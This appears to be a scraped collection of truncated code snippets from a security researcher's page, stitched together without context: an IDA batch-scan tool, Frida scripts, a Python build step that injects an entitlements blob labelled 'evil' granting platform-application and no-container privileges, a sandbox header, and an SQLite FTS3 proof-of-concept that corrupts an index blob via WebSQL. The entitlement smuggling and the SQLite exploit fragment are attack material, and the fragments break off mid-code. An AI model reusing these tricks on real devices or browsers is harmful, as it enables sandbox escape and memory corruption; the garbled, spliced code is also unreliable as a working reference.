codecolorist ChiChou

Recursively scan all executables (PE, ELF and MachO!) in a folder and generate IDA databases in parallel

Usage

node batch.js [path]

	// frida -U --attach-frontmost -l awake.js

	ObjC.schedule(ObjC.mainQueue, () => {
	try {
	ObjC.classes.UIApplication.sharedApplication().setIdleTimerDisabled_(ptr(1))
	} finally {

	}
	})

	import asyncio
	import concurrent.futures
	import frida


	pool = concurrent.futures.ThreadPoolExecutor(max_workers=4)


	def make_handler(dev: frida.core.Device, port:int, buffer_size=4096):
	async def handler(reader, writer):

	import os
	# preinstalled python is python2
	filename = '/'.join(map(os.environ.get, ('TARGET_TEMP_DIR', 'FULL_PRODUCT_NAME'))) + '.xcent'

	evil = '''
	<!---><!-->
	<key>platform-application</key>
	<true/>
	<key>com.apple.private.security.no-container</key>
	<true/>

	#import <Foundation/Foundation.h>
	#include <sandbox.h>
	int sandbox_init_with_parameters(const char* profile,
	uint64_t flags,
	const char* const parameters[],
	char** errorbuf);

	#define SANDBOX_PROFILE "/System/Library/Frameworks/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb"
	#define SANDBOX_NAMED_EXTERNAL 0x0003

	(() => {
	const trs = document.querySelector('table').querySelectorAll('tr')
	const rows = [].slice.call(trs, 3, trs.length - 1)
	const footer = trs[trs.length - 1]
	const sorted = rows.sort((a, b) => {
	const parse = tr => tr.querySelector('td:nth-of-type(2) a').textContent
	.match(/((\d+\.?)+)\.tar\.gz/)[1]
	.split('.')
	.map(s => parseInt(s, 10))

	const poc = `CREATE VIRTUAL TABLE ft USING fts3;
	INSERT INTO ft VALUES('aback');
	INSERT INTO ft VALUES('abaft');
	INSERT INTO ft VALUES('abandon');
	UPDATE ft_segdir SET root = x'0005616261636B03010200FFFFFFFF070266740302020003046E646F6E03030200';
	SELECT * FROM ft WHERE ft MATCH 'abandon';`;

	const name = 'db' + Math.random().toString().slice(2, 5);
	const db = openDatabase(name, '1.0', 'xx', 1024 * 16);